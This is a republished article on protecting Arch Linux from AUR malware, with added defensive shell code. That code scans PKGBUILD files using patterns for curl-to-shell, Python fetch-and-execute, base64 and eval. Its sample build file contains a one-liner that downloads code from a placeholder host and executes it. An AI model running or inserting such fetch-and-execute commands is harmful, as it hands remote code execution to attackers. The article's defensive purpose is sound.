MarketAlert – Real-Time Market & Crypto News, Analysis & Alerts
Here’s How I Avoid AUR Malware on Arch Linux

Last updated: August 8, 2025 1:25 am
Published: 6 months ago

Do you want to try Arch Linux, but feel scared because of the recent malware incident? Are you a current Arch user wondering how to keep your system safe and secure? Well, I have been using the Linux distro for five years now, and here’s my complete guide on staying safe on Arch Linux.

Understanding What Makes Arch Vulnerable

July 2025 was not a great month for Arch Linux — the distribution faced two notable malware incidents, both delivered through compromised packages in the Arch User Repository (AUR). On July 16, 2025, three AUR packages — librewolf-fix-bin, firefox-patch-bin, and zen-browser-patched-bin — were found to contain the CHAOS RAT (Remote Access Trojan), as reported by Linux Security. A second incident, reported by Linuxiac, occurred on July 31, 2025, when a re-uploaded google-chrome-stable package appeared in the AUR. This package’s build script included a Python one-liner that fetched and executed a remote script from an untrusted server.

Thankfully, AUR users quickly noticed something was wrong, and the malicious packages were removed from the AUR within 48 hours in both instances. That said, these are not isolated events. In the past, there have been multiple such incidents where bad actors tried to use the AUR to spread malware across various systems.

So does this make the AUR, and in turn Arch Linux, unsafe and risky? Well, the answer is more complicated than a simple yes or no!

Why Is There Malware in the AUR?

The Arch User Repository is a massive, community-driven library of software for Arch Linux. Unlike the official repositories, where every package is reviewed and signed off by Arch developers, the AUR is almost entirely open — anyone can freely submit a new package, and everyone can instantly install it. Furthermore, if the original maintainer abandons their package, another person can become its new maintainer and start pushing updates.

Because of this flexibility and openness, the AUR is home to tens of thousands of bleeding-edge apps and obscure utilities. It’s why people love AUR and use it. However, this model also introduces its own share of security risks.

Since there is no formal code review process and new AUR packages can go live almost instantly, bad actors can use the platform to quickly distribute malware. A new malicious package won’t infect your system unless you actively choose to install it. However, someone can become the new maintainer of an abandoned package and slip malicious code into it, and that will infect your system as soon as you update that package.

In a poetic fashion, the same openness and speed that make the AUR so powerful are also what make it vulnerable. That said, the AUR can be safe if you make it safe. The AUR community expects that you will read PKGBUILD files, and check the package’s history and comments, before installing AUR packages on your system. If you don’t do your due diligence, then yes, you risk infecting your Arch system with malware!

How I Stay Safe From Malware in the AUR — as a Non-Programmer

I am not a programmer and I don’t know how to read code! That said, I’ve been using Arch-based systems for about five years now. I started off with Manjaro and eventually switched over to Garuda Linux, which is my current daily driver. I’ve found that most of the apps I actually need are available directly in the official repositories or via Flatpaks. I only use the AUR for testing out some niche or quirky apps.

As such, most people, especially newcomers, can entirely avoid the AUR and not bother with the associated security issues. However, if you do need to install an app from the AUR, you can follow my personal safety tips.

Take Regular System Backups

First and foremost, no matter if you’re using something insecure and unstable like Windows or robust like Debian, you should always back up your system — and this goes for Arch as well! You can check out our guide on using rsync for system backup as I find it the best option.

Also, remember to store the backup files on a separate device that’s not always attached to the same system, or else you risk corrupting the backup files if and when the system gets compromised.

Stay Informed: Subscribe and Watch for Security Alerts

I personally have Google Alerts set up for the keywords Arch and AUR. This way I get a daily email with all the latest news on those two topics. On top of that, I also subscribe to r/archlinux and r/linux subreddits. These channels often report security vulnerabilities, pulled packages, or new malware campaigns — sometimes even before the news hits bigger tech sites.

Use Octopi for Installing AUR Packages

While most Arch users would prefer the terminal, I generally use Octopi — a graphical package manager for installing apps and packages on my Garuda PC. As soon as I type in the name of the package I’m looking for, it’ll list all relevant options including which repository is hosting it. There’s also an info tab which shows useful metadata about the package, including who maintains the package and the official project URL.

This saves me a trip to the AUR website as I can quickly check if an app or package is trustworthy. I generally trust packagers with either the distro’s or archlinux.org domain name. If it’s something generic like XYZ (didn’t share email) or [email protected], it’s time to visit its AUR website and investigate a bit more before hitting install!

Check Package Maintainer, Comments, and Change Log

When investigating a package in the AUR, I primarily focus on the maintainer or packager. You can usually click on the name to view all the packages that person is maintaining. Alternatively, they might have the upstream URL pointing to their GitHub page, from where I can learn more about that person.

I always prefer packages that have been maintained by someone with a long history in the Arch or broader Linux community. If the maintainer is new, hasn’t updated the package in a while, or has suddenly taken over an orphaned package, that’s a potential red flag for me.

Next, I check the comments section. If it’s empty or has a lot of complaints, I generally avoid the package. I feel more confident when there is an active conversation happening, and the maintainer is replying to commenters.

Finally, I check the change log to get an idea of when the package was first added to the AUR and who has been maintaining it. My vote of confidence goes to packages where the current maintainer has been involved with it for at least one month, ideally six months!

Scan the PKGBUILD With an LLM

One of the biggest advantages of the AUR is that every package’s build script — called the PKGBUILD — is open for anyone to inspect. This makes it relatively easy to spot if there’s anything fishy going on, but only if you know how to read code. Since I’m not a programmer, I started to resort to large language models (LLMs) to do the job for me.

Whenever I’m even slightly suspicious about a package, I copy the entire PKGBUILD file from the AUR page and paste it into Google AI Studio. It’s free to use and gives you access to Gemini 2.5 Pro — a fairly capable model when it comes to reading and understanding code. I ask it to check the PKGBUILD file and tell me if there is anything to worry about.

LLMs aren’t foolproof, and they can hallucinate or make up false data. As such, you shouldn’t blindly trust what they say. I just use them as an additional security check, and I’d consult a real expert if they flag anything.
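
A deterministic first pass that can run alongside the LLM review, as an added example that is not part of the original article: it flags build-script constructs such as the fetch-and-execute Python one-liner described for the July 31 incident. The function names, the rule list and the sample PKGBUILD are assumptions made for illustration.

```shell
#!/bin/sh
# Added example (not from the article): flag risky constructs in a PKGBUILD or
# .install file. The rule list is an illustrative assumption, not a complete
# or official set; a clean result does not prove a package is safe.

# scan_pkgbuild FILE: prints "[reason] line N:text"; returns 0 if clean, 1 if flagged.
scan_pkgbuild() {
  file=$1
  hits=0
  # Each rule is "reason~extended-regex" (the regexes never contain "~").
  while IFS='~' read -r reason regex; do
    # -n adds line numbers; the second grep drops lines that are only comments.
    matches=$(grep -nE -- "$regex" "$file" | grep -vE '^[0-9]+:[[:space:]]*#' || true)
    [ -n "$matches" ] || continue
    hits=$((hits + 1))
    printf '%s\n' "$matches" | sed "s/^/[$reason] line /"
  done <<'RULES'
download piped into a shell~(curl|wget)[^|;&]*\|[[:space:]]*(sudo[[:space:]]+)?(ba|z|da)?sh([[:space:]]|$)
python one-liner that fetches or executes code~python[0-9.]*[[:space:]]+-c.*(urlopen|urllib|requests\.|exec\()
base64-decoded payload~base64[[:space:]]+(-d|--decode)
eval of a dynamic string~(^|[;&|[:space:]])eval[[:space:]]
URL with a raw IP address~https?://[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+
RULES
  [ "$hits" -eq 0 ]
}

# Constructed sample PKGBUILD (hypothetical package; example.invalid never resolves).
write_sample() {
  cat > "$1" <<'EOF'
pkgname=example-browser-bin
pkgver=1.0
source=("https://example.invalid/example-browser.tar.gz")
# curl https://example.invalid/x | sh   (comment only, must be ignored)
package() {
  install -Dm755 example-browser "$pkgdir/usr/bin/example-browser"
  python -c "import urllib.request as u; exec(u.urlopen('https://example.invalid/s').read())"
}
EOF
}

# Stand-alone use: sh scan.sh path/to/PKGBUILD
if [ $# -gt 0 ]; then
  scan_pkgbuild "$1"
fi
```

Any flagged line is a prompt to read that part of the build script (or have it reviewed) before installing, not a verdict on its own.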

Routinely Delete Orphaned Packages from Your System

Packages are considered orphaned if they were once needed as a dependency for a particular tool you run, but they’re not currently being used by any installed app. This makes them redundant pieces of software that not only take up space on your PC but also increase your threat profile — especially if they’re from the AUR.

That’s why I make it a habit to routinely (once a month) check all my orphaned packages and delete the ones I know I will never use. To see all orphaned dependencies on your system, you can enter the following command:

pacman -Qdt

If you see packages you know you won’t need, you can delete them using the following command, replacing <package_name> with the name of the package:

sudo pacman -Rns <package_name>

Alternatively, you can also use the following command (enter as is, including the parentheses) to delete all orphaned dependencies from your system:

sudo pacman -Rns $(pacman -Qdtq)

What to Do if Your Arch System Is Compromised

Let’s say you start using the AUR and you hear news about some malware plaguing the repository. In that case, the first thing you should do is check if you have that malicious package installed on your system. To do this, simply open the terminal and type the following command, replacing <package_name> with the name of the reported package:

pacman -Qs <package_name>

Alternatively, you can also type this command to see all AUR packages installed on your system:

pacman -Qm

In fact, if this is your first time focusing on the security of your Arch distro, I’d recommend using the above command to get a list of all installed AUR packages and then going through each one of them to find out if any of them have a high threat level. If yes, just remove them and find a replacement. There’s no need to gamble with the security of your system.

Now, let’s say you have found the malicious package on your system. In that case, disconnect from the internet immediately. This will prevent the malware from downloading or uploading any more data. Now delete the package by running the following command, replacing <package_name> with the name of the malicious package:

sudo pacman -Rns <package_name>

Next, turn off your system and use a bootable Linux USB stick to boot into a live Linux environment. From there, use scanning tools like ClamAV (antivirus) or chkrootkit (rootkit detection) to scan and delete any additional malware that might’ve been left behind on your system.

That said, I personally dislike taking any risk and generally would wipe and reinstall the OS if it was compromised. I realize that this might not be a favorable option for some, especially if you have important files stored on your PC. However, if it’s an option you can consider, then I’d highly encourage it.

Also, it’s usually wise to assume your passwords and SSH keys were compromised in the incident. As such, don’t forget to change all your passwords and generate new SSH keys. Prioritize your important accounts first, like your primary email and banking accounts, and work your way down.

There you have it — a quick and effective set of Arch Linux security basics that I personally follow to keep myself safe from malware on Arch Linux. As you can see, with a few good habits and a little extra vigilance, you’re able to minimize the downside and enjoy everything Arch has to offer without potential security issues!

This news is powered by The How-To Geek
